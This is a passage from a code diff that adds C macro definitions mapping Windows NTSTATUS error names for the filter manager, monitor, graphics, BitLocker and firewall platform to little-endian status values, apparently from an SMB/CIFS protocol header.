++#define STATUS_FLT_DISALLOW_FAST_IO cpu_to_le32(0xC01C0004)
++#define STATUS_FLT_INVALID_NAME_REQUEST cpu_to_le32(0xC01C0005)
++#define STATUS_FLT_NOT_SAFE_TO_POST_OPERATION cpu_to_le32(0xC01C0006)
++#define STATUS_FLT_NOT_INITIALIZED cpu_to_le32(0xC01C0007)
++#define STATUS_FLT_FILTER_NOT_READY cpu_to_le32(0xC01C0008)
++#define STATUS_FLT_POST_OPERATION_CLEANUP cpu_to_le32(0xC01C0009)
++#define STATUS_FLT_INTERNAL_ERROR cpu_to_le32(0xC01C000A)
++#define STATUS_FLT_DELETING_OBJECT cpu_to_le32(0xC01C000B)
++#define STATUS_FLT_MUST_BE_NONPAGED_POOL cpu_to_le32(0xC01C000C)
++#define STATUS_FLT_DUPLICATE_ENTRY cpu_to_le32(0xC01C000D)
++#define STATUS_FLT_CBDQ_DISABLED cpu_to_le32(0xC01C000E)
++#define STATUS_FLT_DO_NOT_ATTACH cpu_to_le32(0xC01C000F)
++#define STATUS_FLT_DO_NOT_DETACH cpu_to_le32(0xC01C0010)
++#define STATUS_FLT_INSTANCE_ALTITUDE_COLLISION cpu_to_le32(0xC01C0011)
++#define STATUS_FLT_INSTANCE_NAME_COLLISION cpu_to_le32(0xC01C0012)
++#define STATUS_FLT_FILTER_NOT_FOUND cpu_to_le32(0xC01C0013)
++#define STATUS_FLT_VOLUME_NOT_FOUND cpu_to_le32(0xC01C0014)
++#define STATUS_FLT_INSTANCE_NOT_FOUND cpu_to_le32(0xC01C0015)
++#define STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND cpu_to_le32(0xC01C0016)
++#define STATUS_FLT_INVALID_CONTEXT_REGISTRATION cpu_to_le32(0xC01C0017)
++#define STATUS_FLT_NAME_CACHE_MISS cpu_to_le32(0xC01C0018)
++#define STATUS_FLT_NO_DEVICE_OBJECT cpu_to_le32(0xC01C0019)
++#define STATUS_FLT_VOLUME_ALREADY_MOUNTED cpu_to_le32(0xC01C001A)
++#define STATUS_FLT_ALREADY_ENLISTED cpu_to_le32(0xC01C001B)
++#define STATUS_FLT_CONTEXT_ALREADY_LINKED cpu_to_le32(0xC01C001C)
++#define STATUS_FLT_NO_WAITER_FOR_REPLY cpu_to_le32(0xC01C0020)
++#define STATUS_MONITOR_NO_DESCRIPTOR cpu_to_le32(0xC01D0001)
++#define STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT cpu_to_le32(0xC01D0002)
++#define STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM cpu_to_le32(0xC01D0003)
++#define STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK cpu_to_le32(0xC01D0004)
++#define STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED cpu_to_le32(0xC01D0005)
++#define STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK cpu_to_le32(0xC01D0006)
++#define STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK cpu_to_le32(0xC01D0007)
++#define STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA cpu_to_le32(0xC01D0008)
++#define STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK cpu_to_le32(0xC01D0009)
++#define STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER cpu_to_le32(0xC01E0000)
++#define STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER cpu_to_le32(0xC01E0001)
++#define STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER cpu_to_le32(0xC01E0002)
++#define STATUS_GRAPHICS_ADAPTER_WAS_RESET cpu_to_le32(0xC01E0003)
++#define STATUS_GRAPHICS_INVALID_DRIVER_MODEL cpu_to_le32(0xC01E0004)
++#define STATUS_GRAPHICS_PRESENT_MODE_CHANGED cpu_to_le32(0xC01E0005)
++#define STATUS_GRAPHICS_PRESENT_OCCLUDED cpu_to_le32(0xC01E0006)
++#define STATUS_GRAPHICS_PRESENT_DENIED cpu_to_le32(0xC01E0007)
++#define STATUS_GRAPHICS_CANNOTCOLORCONVERT cpu_to_le32(0xC01E0008)
++#define STATUS_GRAPHICS_NO_VIDEO_MEMORY cpu_to_le32(0xC01E0100)
++#define STATUS_GRAPHICS_CANT_LOCK_MEMORY cpu_to_le32(0xC01E0101)
++#define STATUS_GRAPHICS_ALLOCATION_BUSY cpu_to_le32(0xC01E0102)
++#define STATUS_GRAPHICS_TOO_MANY_REFERENCES cpu_to_le32(0xC01E0103)
++#define STATUS_GRAPHICS_TRY_AGAIN_LATER cpu_to_le32(0xC01E0104)
++#define STATUS_GRAPHICS_TRY_AGAIN_NOW cpu_to_le32(0xC01E0105)
++#define STATUS_GRAPHICS_ALLOCATION_INVALID cpu_to_le32(0xC01E0106)
++#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE cpu_to_le32(0xC01E0107)
++#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED cpu_to_le32(0xC01E0108)
++#define STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION cpu_to_le32(0xC01E0109)
++#define STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE cpu_to_le32(0xC01E0110)
++#define STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION cpu_to_le32(0xC01E0111)
++#define STATUS_GRAPHICS_ALLOCATION_CLOSED cpu_to_le32(0xC01E0112)
++#define STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE cpu_to_le32(0xC01E0113)
++#define STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE cpu_to_le32(0xC01E0114)
++#define STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE cpu_to_le32(0xC01E0115)
++#define STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST cpu_to_le32(0xC01E0116)
++#define STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE cpu_to_le32(0xC01E0200)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0300)
++#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED cpu_to_le32(0xC01E0301)
++#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED cpu_to_le32(0xC01E0302)
++#define STATUS_GRAPHICS_INVALID_VIDPN cpu_to_le32(0xC01E0303)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE cpu_to_le32(0xC01E0304)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET cpu_to_le32(0xC01E0305)
++#define STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED cpu_to_le32(0xC01E0306)
++#define STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET cpu_to_le32(0xC01E0308)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET cpu_to_le32(0xC01E0309)
++#define STATUS_GRAPHICS_INVALID_FREQUENCY cpu_to_le32(0xC01E030A)
++#define STATUS_GRAPHICS_INVALID_ACTIVE_REGION cpu_to_le32(0xC01E030B)
++#define STATUS_GRAPHICS_INVALID_TOTAL_REGION cpu_to_le32(0xC01E030C)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE cpu_to_le32(0xC01E0310)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE cpu_to_le32(0xC01E0311)
++#define STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET cpu_to_le32(0xC01E0312)
++#define STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY cpu_to_le32(0xC01E0313)
++#define STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET cpu_to_le32(0xC01E0314)
++#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET cpu_to_le32(0xC01E0315)
++#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET cpu_to_le32(0xC01E0316)
++#define STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET cpu_to_le32(0xC01E0317)
++#define STATUS_GRAPHICS_TARGET_ALREADY_IN_SET cpu_to_le32(0xC01E0318)
++#define STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH cpu_to_le32(0xC01E0319)
++#define STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY cpu_to_le32(0xC01E031A)
++#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET cpu_to_le32(0xC01E031B)
++#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE cpu_to_le32(0xC01E031C)
++#define STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET cpu_to_le32(0xC01E031D)
++#define STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET cpu_to_le32(0xC01E031F)
++#define STATUS_GRAPHICS_STALE_MODESET cpu_to_le32(0xC01E0320)
++#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET cpu_to_le32(0xC01E0321)
++#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE cpu_to_le32(0xC01E0322)
++#define STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN cpu_to_le32(0xC01E0323)
++#define STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0324)
++#define STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION cpu_to_le32(0xC01E0325)
++#define STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES cpu_to_le32(0xC01E0326)
++#define STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0327)
++#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE cpu_to_le32(0xC01E0328)
++#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET cpu_to_le32(0xC01E0329)
++#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET cpu_to_le32(0xC01E032A)
++#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR cpu_to_le32(0xC01E032B)
++#define STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET cpu_to_le32(0xC01E032C)
++#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET cpu_to_le32(0xC01E032D)
++#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E032E)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE cpu_to_le32(0xC01E032F)
++#define STATUS_GRAPHICS_RESOURCES_NOT_RELATED cpu_to_le32(0xC01E0330)
++#define STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0331)
++#define STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0332)
++#define STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET cpu_to_le32(0xC01E0333)
++#define STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER cpu_to_le32(0xC01E0334)
++#define STATUS_GRAPHICS_NO_VIDPNMGR cpu_to_le32(0xC01E0335)
++#define STATUS_GRAPHICS_NO_ACTIVE_VIDPN cpu_to_le32(0xC01E0336)
++#define STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0337)
++#define STATUS_GRAPHICS_MONITOR_NOT_CONNECTED cpu_to_le32(0xC01E0338)
++#define STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0339)
++#define STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE cpu_to_le32(0xC01E033A)
++#define STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE cpu_to_le32(0xC01E033B)
++#define STATUS_GRAPHICS_INVALID_STRIDE cpu_to_le32(0xC01E033C)
++#define STATUS_GRAPHICS_INVALID_PIXELFORMAT cpu_to_le32(0xC01E033D)
++#define STATUS_GRAPHICS_INVALID_COLORBASIS cpu_to_le32(0xC01E033E)
++#define STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE cpu_to_le32(0xC01E033F)
++#define STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0340)
++#define STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT cpu_to_le32(0xC01E0341)
++#define STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE cpu_to_le32(0xC01E0342)
++#define STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN cpu_to_le32(0xC01E0343)
++#define STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL cpu_to_le32(0xC01E0344)
++#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION cpu_to_le32(0xC01E0345)
++#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED cpu_to_le32(0xC01E0346)
++#define STATUS_GRAPHICS_INVALID_GAMMA_RAMP cpu_to_le32(0xC01E0347)
++#define STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED cpu_to_le32(0xC01E0348)
++#define STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED cpu_to_le32(0xC01E0349)
++#define STATUS_GRAPHICS_MODE_NOT_IN_MODESET cpu_to_le32(0xC01E034A)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON cpu_to_le32(0xC01E034D)
++#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE cpu_to_le32(0xC01E034E)
++#define STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE cpu_to_le32(0xC01E034F)
++#define STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS cpu_to_le32(0xC01E0350)
++#define STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING cpu_to_le32(0xC01E0352)
++#define STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED cpu_to_le32(0xC01E0353)
++#define STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS cpu_to_le32(0xC01E0354)
++#define STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT cpu_to_le32(0xC01E0355)
++#define STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM cpu_to_le32(0xC01E0356)
++#define STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN cpu_to_le32(0xC01E0357)
++#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT cpu_to_le32(0xC01E0358)
++#define STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED cpu_to_le32(0xC01E0359)
++#define STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION cpu_to_le32(0xC01E035A)
++#define STATUS_GRAPHICS_INVALID_CLIENT_TYPE cpu_to_le32(0xC01E035B)
++#define STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET cpu_to_le32(0xC01E035C)
++#define STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED cpu_to_le32(0xC01E0400)
++#define STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED cpu_to_le32(0xC01E0401)
++#define STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER cpu_to_le32(0xC01E0430)
++#define STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED cpu_to_le32(0xC01E0431)
++#define STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED cpu_to_le32(0xC01E0432)
++#define STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY cpu_to_le32(0xC01E0433)
++#define STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED cpu_to_le32(0xC01E0434)
++#define STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON cpu_to_le32(0xC01E0435)
++#define STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE cpu_to_le32(0xC01E0436)
++#define STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER cpu_to_le32(0xC01E0438)
++#define STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED cpu_to_le32(0xC01E043B)
++#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS cpu_to_le32(0xC01E051C)
++#define STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST cpu_to_le32(0xC01E051D)
++#define STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC01E051E)
++#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS cpu_to_le32(0xC01E051F)
++#define STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED cpu_to_le32(0xC01E0520)
++#define STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST cpu_to_le32(0xC01E0521)
++#define STATUS_GRAPHICS_OPM_NOT_SUPPORTED cpu_to_le32(0xC01E0500)
++#define STATUS_GRAPHICS_COPP_NOT_SUPPORTED cpu_to_le32(0xC01E0501)
++#define STATUS_GRAPHICS_UAB_NOT_SUPPORTED cpu_to_le32(0xC01E0502)
++#define STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS cpu_to_le32(0xC01E0503)
++#define STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E0504)
++#define STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST cpu_to_le32(0xC01E0505)
++#define STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME cpu_to_le32(0xC01E0506)
++#define STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP cpu_to_le32(0xC01E0507)
++#define STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED cpu_to_le32(0xC01E0508)
++#define STATUS_GRAPHICS_OPM_INVALID_POINTER cpu_to_le32(0xC01E050A)
++#define STATUS_GRAPHICS_OPM_INTERNAL_ERROR cpu_to_le32(0xC01E050B)
++#define STATUS_GRAPHICS_OPM_INVALID_HANDLE cpu_to_le32(0xC01E050C)
++#define STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE cpu_to_le32(0xC01E050D)
++#define STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH cpu_to_le32(0xC01E050E)
++#define STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED cpu_to_le32(0xC01E050F)
++#define STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED cpu_to_le32(0xC01E0510)
++#define STATUS_GRAPHICS_PVP_HFS_FAILED cpu_to_le32(0xC01E0511)
++#define STATUS_GRAPHICS_OPM_INVALID_SRM cpu_to_le32(0xC01E0512)
++#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP cpu_to_le32(0xC01E0513)
++#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP cpu_to_le32(0xC01E0514)
++#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA cpu_to_le32(0xC01E0515)
++#define STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET cpu_to_le32(0xC01E0516)
++#define STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH cpu_to_le32(0xC01E0517)
++#define STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE cpu_to_le32(0xC01E0518)
++#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS cpu_to_le32(0xC01E051A)
++#define STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS cpu_to_le32(0xC01E051B)
++#define STATUS_GRAPHICS_I2C_NOT_SUPPORTED cpu_to_le32(0xC01E0580)
++#define STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC01E0581)
++#define STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA cpu_to_le32(0xC01E0582)
++#define STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA cpu_to_le32(0xC01E0583)
++#define STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED cpu_to_le32(0xC01E0584)
++#define STATUS_GRAPHICS_DDCCI_INVALID_DATA cpu_to_le32(0xC01E0585)
++#define STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE cpu_to_le32(0xC01E0586)
++#define STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING cpu_to_le32(0xC01E0587)
++#define STATUS_GRAPHICS_MCA_INTERNAL_ERROR cpu_to_le32(0xC01E0588)
++#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND cpu_to_le32(0xC01E0589)
++#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH cpu_to_le32(0xC01E058A)
++#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM cpu_to_le32(0xC01E058B)
++#define STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE cpu_to_le32(0xC01E058C)
++#define STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS cpu_to_le32(0xC01E058D)
++#define STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED cpu_to_le32(0xC01E05E0)
++#define STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME cpu_to_le32(0xC01E05E1)
++#define STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP cpu_to_le32(0xC01E05E2)
++#define STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED cpu_to_le32(0xC01E05E3)
++#define STATUS_GRAPHICS_INVALID_POINTER cpu_to_le32(0xC01E05E4)
++#define STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE cpu_to_le32(0xC01E05E5)
++#define STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E05E6)
++#define STATUS_GRAPHICS_INTERNAL_ERROR cpu_to_le32(0xC01E05E7)
++#define STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS cpu_to_le32(0xC01E05E8)
++#define STATUS_FVE_LOCKED_VOLUME cpu_to_le32(0xC0210000)
++#define STATUS_FVE_NOT_ENCRYPTED cpu_to_le32(0xC0210001)
++#define STATUS_FVE_BAD_INFORMATION cpu_to_le32(0xC0210002)
++#define STATUS_FVE_TOO_SMALL cpu_to_le32(0xC0210003)
++#define STATUS_FVE_FAILED_WRONG_FS cpu_to_le32(0xC0210004)
++#define STATUS_FVE_FAILED_BAD_FS cpu_to_le32(0xC0210005)
++#define STATUS_FVE_FS_NOT_EXTENDED cpu_to_le32(0xC0210006)
++#define STATUS_FVE_FS_MOUNTED cpu_to_le32(0xC0210007)
++#define STATUS_FVE_NO_LICENSE cpu_to_le32(0xC0210008)
++#define STATUS_FVE_ACTION_NOT_ALLOWED cpu_to_le32(0xC0210009)
++#define STATUS_FVE_BAD_DATA cpu_to_le32(0xC021000A)
++#define STATUS_FVE_VOLUME_NOT_BOUND cpu_to_le32(0xC021000B)
++#define STATUS_FVE_NOT_DATA_VOLUME cpu_to_le32(0xC021000C)
++#define STATUS_FVE_CONV_READ_ERROR cpu_to_le32(0xC021000D)
++#define STATUS_FVE_CONV_WRITE_ERROR cpu_to_le32(0xC021000E)
++#define STATUS_FVE_OVERLAPPED_UPDATE cpu_to_le32(0xC021000F)
++#define STATUS_FVE_FAILED_SECTOR_SIZE cpu_to_le32(0xC0210010)
++#define STATUS_FVE_FAILED_AUTHENTICATION cpu_to_le32(0xC0210011)
++#define STATUS_FVE_NOT_OS_VOLUME cpu_to_le32(0xC0210012)
++#define STATUS_FVE_KEYFILE_NOT_FOUND cpu_to_le32(0xC0210013)
++#define STATUS_FVE_KEYFILE_INVALID cpu_to_le32(0xC0210014)
++#define STATUS_FVE_KEYFILE_NO_VMK cpu_to_le32(0xC0210015)
++#define STATUS_FVE_TPM_DISABLED cpu_to_le32(0xC0210016)
++#define STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO cpu_to_le32(0xC0210017)
++#define STATUS_FVE_TPM_INVALID_PCR cpu_to_le32(0xC0210018)
++#define STATUS_FVE_TPM_NO_VMK cpu_to_le32(0xC0210019)
++#define STATUS_FVE_PIN_INVALID cpu_to_le32(0xC021001A)
++#define STATUS_FVE_AUTH_INVALID_APPLICATION cpu_to_le32(0xC021001B)
++#define STATUS_FVE_AUTH_INVALID_CONFIG cpu_to_le32(0xC021001C)
++#define STATUS_FVE_DEBUGGER_ENABLED cpu_to_le32(0xC021001D)
++#define STATUS_FVE_DRY_RUN_FAILED cpu_to_le32(0xC021001E)
++#define STATUS_FVE_BAD_METADATA_POINTER cpu_to_le32(0xC021001F)
++#define STATUS_FVE_OLD_METADATA_COPY cpu_to_le32(0xC0210020)
++#define STATUS_FVE_REBOOT_REQUIRED cpu_to_le32(0xC0210021)
++#define STATUS_FVE_RAW_ACCESS cpu_to_le32(0xC0210022)
++#define STATUS_FVE_RAW_BLOCKED cpu_to_le32(0xC0210023)
++#define STATUS_FWP_CALLOUT_NOT_FOUND cpu_to_le32(0xC0220001)
++#define STATUS_FWP_CONDITION_NOT_FOUND cpu_to_le32(0xC0220002)
++#define STATUS_FWP_FILTER_NOT_FOUND cpu_to_le32(0xC0220003)
++#define STATUS_FWP_LAYER_NOT_FOUND cpu_to_le32(0xC0220004)
++#define STATUS_FWP_PROVIDER_NOT_FOUND cpu_to_le32(0xC0220005)
++#define STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND cpu_to_le32(0xC0220006)
++#define STATUS_FWP_SUBLAYER_NOT_FOUND cpu_to_le32(0xC0220007)
++#define STATUS_FWP_NOT_FOUND cpu_to_le32(0xC0220008)
++#define STATUS_FWP_ALREADY_EXISTS cpu_to_le32(0xC0220009)
++#define STATUS_FWP_IN_USE cpu_to_le32(0xC022000A)
++#define STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS cpu_to_le32(0xC022000B)
++#define STATUS_FWP_WRONG_SESSION cpu_to_le32(0xC022000C)
++#define STATUS_FWP_NO_TXN_IN_PROGRESS cpu_to_le32(0xC022000D)
++#define STATUS_FWP_TXN_IN_PROGRESS cpu_to_le32(0xC022000E)
++#define STATUS_FWP_TXN_ABORTED cpu_to_le32(0xC022000F)
++#define STATUS_FWP_SESSION_ABORTED cpu_to_le32(0xC0220010)
++#define STATUS_FWP_INCOMPATIBLE_TXN cpu_to_le32(0xC0220011)
++#define STATUS_FWP_TIMEOUT cpu_to_le32(0xC0220012)
++#define STATUS_FWP_NET_EVENTS_DISABLED cpu_to_le32(0xC0220013)
++#define STATUS_FWP_INCOMPATIBLE_LAYER cpu_to_le32(0xC0220014)
++#define STATUS_FWP_KM_CLIENTS_ONLY cpu_to_le32(0xC0220015)
++#define STATUS_FWP_LIFETIME_MISMATCH cpu_to_le32(0xC0220016)
++#define STATUS_FWP_BUILTIN_OBJECT cpu_to_le32(0xC0220017)
++#define STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS cpu_to_le32(0xC0220018)
++#define STATUS_FWP_TOO_MANY_CALLOUTS cpu_to_le32(0xC0220018)
++#define STATUS_FWP_NOTIFICATION_DROPPED cpu_to_le32(0xC0220019)
++#define STATUS_FWP_TRAFFIC_MISMATCH cpu_to_le32(0xC022001A)
++#define STATUS_FWP_INCOMPATIBLE_SA_STATE cpu_to_le32(0xC022001B)
++#define STATUS_FWP_NULL_POINTER cpu_to_le32(0xC022001C)
++#define STATUS_FWP_INVALID_ENUMERATOR cpu_to_le32(0xC022001D)
++#define STATUS_FWP_INVALID_FLAGS cpu_to_le32(0xC022001E)
++#define STATUS_FWP_INVALID_NET_MASK cpu_to_le32(0xC022001F)
++#define STATUS_FWP_INVALID_RANGE cpu_to_le32(0xC0220020)
++#define STATUS_FWP_INVALID_INTERVAL cpu_to_le32(0xC0220021)
++#define STATUS_FWP_ZERO_LENGTH_ARRAY cpu_to_le32(0xC0220022)
++#define STATUS_FWP_NULL_DISPLAY_NAME cpu_to_le32(0xC0220023)
++#define STATUS_FWP_INVALID_ACTION_TYPE cpu_to_le32(0xC0220024)
++#define STATUS_FWP_INVALID_WEIGHT cpu_to_le32(0xC0220025)
++#define STATUS_FWP_MATCH_TYPE_MISMATCH cpu_to_le32(0xC0220026)
++#define STATUS_FWP_TYPE_MISMATCH cpu_to_le32(0xC0220027)
++#define STATUS_FWP_OUT_OF_BOUNDS cpu_to_le32(0xC0220028)
++#define STATUS_FWP_RESERVED cpu_to_le32(0xC0220029)
++#define STATUS_FWP_DUPLICATE_CONDITION cpu_to_le32(0xC022002A)
++#define STATUS_FWP_DUPLICATE_KEYMOD cpu_to_le32(0xC022002B)
++#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002C)
++#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER cpu_to_le32(0xC022002D)
++#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002E)
